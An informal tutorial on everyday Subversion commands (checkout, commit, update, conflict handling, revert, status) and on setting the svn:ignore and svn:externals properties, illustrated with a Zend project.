Once you run this command and the directory is created your subversion is setup and you are ready to work on your project. Be warned, however, upon checking out your first copy, you will create a directory called ".svn" in each directory that is in the repository. These .svn folders keep metadata about your working copy. Alter one of these files, and you're likely to break your working copy. If this happens, you will have to re-checkout the most recent copy and re-do your changes. Also please note: if you break your current working copy with this method (either accidentally or other), try not to just copy directories in their entirety. Only copy files individually or open the files and edit them manually; for copying the directory in its entirety will only break the working copy again... (a lesson learned the hard way by your's sincerely, J).
To take a working copy out of subversion control, you can execute the following command on *nix-based systems:

find [dir] -type d -name .svn -prune -exec rm -Rf {} \;

Where "[dir]" is the location you want to remove from version control.

svn co --help
for more info.

Committing a Project

svn commit [-F [File] --log-file -m [message] ]


svn ci [-F [File] --log-file -m [message] ]

Optional Parameters:
-F- Optional. Attach a log file.
File- The location of the log message
--force-log- Optional. Forces SVN to recognize the parameter for -F to be a log file
-m- Optional. Attach a message.
message- The message to be sent
If -F and -m are omitted, SVN will launch the environment variable "SVN_EDITOR" as the text editor to create a log file to attach to this update. Therefore, if you keep a local CHANGELOG file on your development server, you can easily track changes you've made to the site in addition to skipping this tedious task of remembering what changes you might've made to the site.

Running this command will commit your latest changes to the repository.
svn ci --help
for more info.

Viewing A Revision's Log

svn log

This is a handy tool that allows you to see all your changes over the course of the updating of the project. This is the entire log file for all the changes that have been made on the project and is the reason why is is strongly recommended that you remove the contents of your CHANGELOG after every commit.
svn log --help
for more info.

Updating A Revision

svn update


svn up

This will bring your current working copy to the most recent revision. If any conflicts are discovered during this update, (e.g. you have a file more recent than the repository) SVN will prompt you as to what you want to do.
Options for reference are as follows:
e(E)dit- Edit the current file to resolve conflicts. Launches %SVN_EDITOR% or $SVN_EDITOR
r(R)esolved- Available after selecting the "e" option. After you've edited and saved changes, you can classify them as "resolved" meaning your saved temp file will become your local copy of the file in question.
df(D)iff-(F)ull- Runs "diff" on the local working copy and the repository's
mf(M)ine-(F)ull- Drops the current repository's changes and keeps your local copy of this file in question.
tf(T)heirs-(F)ull- Drops all your local changes and overwrites the file with the repository's copy of the file in question.
h(H)elp- Get some more info on available commands.
svn up --help
for more info.

Resolving Conflicts

When you find conflicts, you will have the option to edit the files, find the differences, and resolve them. You will find globs of text that follow a format similar to this:

--- old 2011-04-25 13:39:37.000000000 -0400
+++ new 2011-04-25 13:40:01.000000000 -0400
@@ -3,8 +3,8 @@
auctor, dui in hendrerit ultricies, est enim faucibus dui, sit amet lobortis orci ligula sed orci.
Maecenas dictum bibendum nisl, vel mattis nulla pretium id. Praesent dignissim convallis tellus, vel
bibendum tellus euismod a. Mauris tincidunt ipsum magna. Quisque sodales convallis dictum. Etiam eu

-ante velit. Donec sed magna nisi, in tincidunt ipsum. Class aptent taciti sociosqu ad litora
-torquent per conubia nostra, per inceptos himenaeos. Ut lectus arcu, feugiat at laoreet ac,

+ante latin. Donec sed magna nisi, in tincidunt ipsum. Class aptent taciti sociosqu ad litora
+torquent per conubia ora nostra, per inceptos himenaeos. Ut lectus arcu, feugiat at laoreet ac,

dignissim vel elit. In posuere massa vel metus suscipit euismod. Sed eget purus lacus, vel accumsan
dui. Sed ut nisl eget dui blandit molestie nec gravida ligula. Duis et pulvinar justo. In eu enim
sit amet nulla accumsan vestibulum non at sapien. Integer viverra cursus odio. Suspendisse placerat

This has been color-coded to help determine the general syntax of this diff command.

Reverting Changes

svn revert

If you update and you have issues, this command may come in handy in a pinch. This command will revert all changes since the last update.
svn revert --help
for more info.

Adding Files

svn add [File]
svn add [File1] [File2] [File3] ...
This command will add files to the subversion repository.
svn add --help
for more info.

Removing Files

svn remove [File] [--keep-local]
svn delete [File]
svn rm [File]

If --keep-local is used, svn will keep the local copy of the file in question and will only remove the subversion's copy and also remove it from svn control. Otherwise, delete local copy + repository's copy.
svn rm --help
for more info.

File Status

svn status

If you make changes to the local working copy and you loose track of what files were changed, this handy little command will tell you what files have what status in the local working copy. The prefix before the files determines their current status.
svn status --help
for more info.

SVN Properties

We're gonna throw a curve into the mix because it has been requested so many times, and I find this feature of SVN to be so darn useful. There are these things you can use called properties which can be set on directories and files. Some of these properties are set automatically, while others must be set manually. Each property has its own features and rules, however I'll only explain the two most frequently used here. This should be enough to get the general concept of it so you can reference the documentation and easily pickup the syntax for the other properties.


svn propset svn:ignore [-F file] [Directory]
This will tell SVN to ignore files and folders in the specified directory based on the rules defined in the contents of the file. Explinations are best with an example...
Let's assume you have the following directory structure (a Zend Project):

├── application
│   ├── Bootstrap.php
│   ├── controllers
│   ├── models
│   ├── modules
│   ├── setup.php
│   └── views
│   └── scripts
├── cache
├── library
│   ├── App
│   └── Zend
├── public
│   └── assets
│   ├── css
│   ├── images
│   └── js
├── run
├── saveState
└── tests
└── bootstrap.php
All of these except for `run' and `saveState' are in the repository, but you're getting annoyed by the constant reminder in SVN that those files aren't under version control. You can tell SVN to ignore those files that aren't under version control by setting the svn:ignore property on the current working directory. To do this, it's best for self-documentation purposes if you add a .ignore file in the current directory and add it to version control. That way other people working on the project can see what files/directories aren't under SVN control and want to be ignored. The .ignore file will have a newline-delimited list of files and folders to ignore based on a shell pattern. This particular project would have the following .ignore file:
Next, you specify this file on the command to set the ignore property:
svn propset svn:ignore -F .ignore .
This will tell SVN to ignore files and directories in the current working directory based on the rules defined by the file. Since `run' and `saveState' are specified in the file, all files and folders with those names will be ignored, and you won't see them with the question mark in `svn stat'
NOTE: svn:ignore does not work recursively. If you try to specify files inside of directories, you will find those files are not ignored. If you want to exclude files within directories, you'll have to set the property on that directory according to the rules of files you want ignored. A prime example of this would be if you wanted to ignore everything in the `cache' directory. To ignore all files in said directory create `cache/.ignore' and add that to version control. Next, add this to cache/.ignore:
Another Note: The .ignore files are not required. It's a semantic I include in this tutorial to make things easier for other developers. It would be just as possible to simply deal with the properties directly, but having a file under version control that helps make these properties easier to manage.
That's it! Next, run this command to set the property:
svn propset svn:ignore -F cache/.ignore cache/
Next thing you know, if you run `svn stat' on cache, you find that everything that wasn't under version control is removed from the listing! This same philosophy can be used to wildcard filenames as well. For example, to ignore all .old files, add "*.old" to your .ignore file, and set the property.
svn propset --help
for more info.


Sometimes you're working on a project and you have a library of code that is maintained by someone else who also uses SVN. You want to include their library in your project, and so you checkout a copy of their work into your SVN repository. However, you want everyone else who checks out a copy of your project to follow this same checkout so the library can be used. This can be accomplished with the SVN:Externals property. The syntax of the SVN:Externals property is a bit different from SVN:Ignore in that you must specify the URL to the repository that will be used in the external checkout. To better track where externals occur, it's best to keep a single file in the root of your project called `.externals'. The syntax of the .externals file is as follows:
[Directory] [Repo-URL]
Where [Directory] is the target local directory that will contain the checkout, and [Repo-URL] is the URL to the checkout. Lets say in our Zend project described in the SVN:Ignore section needs to have the Zend library checked out in the `library' directory. Place this in your .externals file:
library/Zend    http://framework.zend.com/svn/framework/standard/trunk/library/Zend/
You can run this command to set the property:
svn propset svn:externals . -F .externals
Now when you run `svn up' in the root of the project, you will see it extract from the external repository. This is a very handy method to include externals and link your project to other repositories.


That's all I can think of for now that will prepare you for what you may encounter. If you need any further help hit me up and I'll do the best I can to help. Should I find that this could use some more detail in some places, I'll make changes accordingly.